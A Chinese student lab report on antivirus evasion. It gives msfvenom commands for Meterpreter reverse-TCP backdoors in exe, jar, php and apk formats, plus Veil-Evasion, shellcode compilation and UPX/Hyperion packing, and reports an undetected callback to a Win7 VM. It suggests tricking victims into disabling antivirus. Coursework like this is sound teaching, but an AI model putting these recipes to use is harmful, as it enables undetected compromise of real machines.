20165306 Exp3 免杀原理与实践

Exp3 免杀原理与实践

一、实践内容概述

1.正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，加壳工具，使用shellcode编程

2.通过组合应用各种技术实现恶意代码免杀

3.用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

4.基础问题回答

（1）杀软是如何检测出恶意代码的？

基于特征码的检测
- 简单来说一段特征码就是一段或多段数据。如果一个可执行文件（或其他运行的库、脚本等）包含这样的数据则被认为是恶意代码。
- AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特征码库就是没有用的库。
启发式恶意软件检测
- 如果一个软件在干通常是恶意软件干的事，看起来像个恶意软件，那我们就把它当成一个恶意软件。
- 优点：可以检测0-day恶意软件；具有一定通用性。
- 缺点：实时监控系统行为，开销稍多；没有基于特征码的精确度高。
基于行为的恶意软件检测
- 基于行为的检测相当于是启发式的一种，或者是加入了行为监控的启发式。

（2）免杀是做什么？

一般是对恶意软件做处理，让它不被杀毒软件所检测，也是渗透测试中需要使用到的技术。

（3）免杀的基本方法有哪些？

改变特征码
- 如果你手里只有EXE：加壳--压缩壳、加密壳。
- 有shellcode（像Meterpreter）：用encode进行编码；基于payload重新编译生成可执行文件。
- 有源代码：用其他语言进行重写再编译（veil-evasion）。
改变行为
- 通讯方式：尽量使用反弹式连接；使用隧道技术；加密通讯数据。
- 操作模式：基于内存操作；减少对系统的修改；加入混淆作用的正常功能代码。
非常规方法
- 使用一个有漏洞的应用当成后门，编写攻击代码集成到如MSF中。
- 使用社工类攻击，诱骗目标关闭AV软件。
- 纯手工打造一个恶意软件。

二、实践具体步骤

（一）任务一：正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，使用shellcode编程，加壳工具

1.正确使用msf编码器

输入指令 # msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.19.128 LPORT=5306 -f exe > msf5306.exe生成exe文件

Windows自带杀毒软件发现了它

关闭防火墙和实时保护，使用VirusTotal进行扫描

使用Virscan进行扫描

开启电脑管家

编码多次仍被检测出来的原因：
- shikata_ga_nai总会有解码(decoder stub)部分需要加入的exe中，只要盯住这部分就可以了。
- 模板是msfvenom用来生成最终Exe的那个壳子exe文件，msfvenom会以固定的模板生成exe，所有它生成的exe，如果使用默认参数或模板，也有一定的固定特征。如果使用msfvenom免杀，就要使用原生的模板。

2.msfvenom生成如jar之类的其他文件

输入指令msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x > 5306_java_backdoor.jar生成java后门程序

扫描结果如下

开启电脑管家

输入指令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x> 5306_php_backdoor.php生成php后门程序

扫描结果如下

开启电脑管家

输入指令msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x> 5306_android_backdoor.apk生成Android后门程序

扫描结果如下

开启电脑管家

3.使用veil-evasion生成后门程序及检测

打开热点
git clone https://www.github.com/Veil-Framework/Veil-Evasion.git从github上进行clone下载
下载完成后，安装软件配置包，依次输入指令ls,cd Veil-Evasion,ls,cd setup,./setup.sh
询问是否继续安装时，输入Y
跳出python for windows安装界面，一路点击Next,Finish,Accept

出现Setup-Ruby1.8.7-p371时，全选中复选框，点击Install

输入list

选择6） c/meterpreter/rev_tcp

依次输入命令set LHOST 192.168.19.128(Kali的IP),set LPORT 5306，options

输入指令generate生成文件，输入payload名字veil53061

依图中所示路径，找到了veil53061.exe，小小地开心一哈~

用virustotal检测一下，还是被发现了

开启电脑管家

注：下次进入veil，需先进入到有Veil-Evasion的文件夹，然后输入指令./Veil-Evasion.py

4.C语言调用Shellcode

输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 -f c用C语言生成一段shellcode

touch 20165306buf.c创建一个文件，将刚刚生成的unsigned char buf[]复制到其中

输入指令i686-w64-mingw32-g++ 20165306buf.c -o 20165306buf.exe生成可执行文件

用virustotal检测如下

开启电脑管家

5.加壳


- 加壳的全称应该是可执行程序资源压缩，压缩后的程序可以直接运行。

- 加壳的另一种常用的方式是在二进制的程序中植入一段代码，在运行的时候优先取得程序的控制权，之后再把控制权交还给原始代码，这样做的目的是为了隐藏程序真正的OEP（入口点，防止被破解）。大多数病毒就是基于此原理。

- 加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析，以达到保护壳内原始程序以及软件不被外部程序破坏，保证原始程序正常运行。

- 这种技术也常用来保护软件版权，防止软件被破解。但对于病毒，加壳可以绕过一些杀毒软件的扫描，从而实现它作为病毒的一些入侵或破坏的一些特性。

- MSF的编码器使用类似方法，对shellcode进行再编码。

- 从技术上分壳分为：

    - 压缩壳：减少应用体积，如ASPack，UPX
    - 加密壳：版权保护，反跟踪。如ASProtect,Armadillo
    - 虚拟机：通过类似编译手段，将应用指令转换为自己设计的指令集。如VMProtect, Themida

压缩壳（UPX）

给20165306buf.exe加个壳得到5306_upxed.exe

用virustotal检测如下

开启电脑管家

加密壳（Hyperion）

将5306_upxed.exe拷贝到/usr/share/windows-binaries/hyperion/目录中

进入目录/usr/share/windows-binaries/hyperion/中

输入指令wine hyperion.exe -v 5306_upxed.exe 5306_upxed_Hyperion.exe加壳

被Windows自带杀软发现

用virustotal检测如下

开启电脑管家

（二）任务二：通过组合应用各种技术实现恶意代码免杀

C语言调用shellcode+加密壳+压缩壳

使用msfconsole回连

电脑管家13.3.20237.212没有发现

（三）任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

受害者：win7虚拟机

杀毒软件：电脑管家13.3.20237.212

对20165306buf加密壳，再压缩壳，生成5306buf_Hyperion_upxed.exe

将Win7虚拟机和Kali ping通，在Win7中设置共享文件夹，安装ncat

使用msfconsole回连

Win7的电脑管家没有发现

对20165306buf.exe加压缩壳生成20165306buf_upxed.exe，室友电脑帮忙扫描

三、实验中遇到的问题

问题1：无法获得锁

原因：其他进程占用了自己要使用的资源
解决：ps aux | grep "apt-get" 列出所有占用apt资源的进程，sudo kill 进程id结束其他进程,然后输入指令sudo rm /var/cache/apt/archives/lock和sudo rm /var/lib/dpkg/lock。

参考解决方法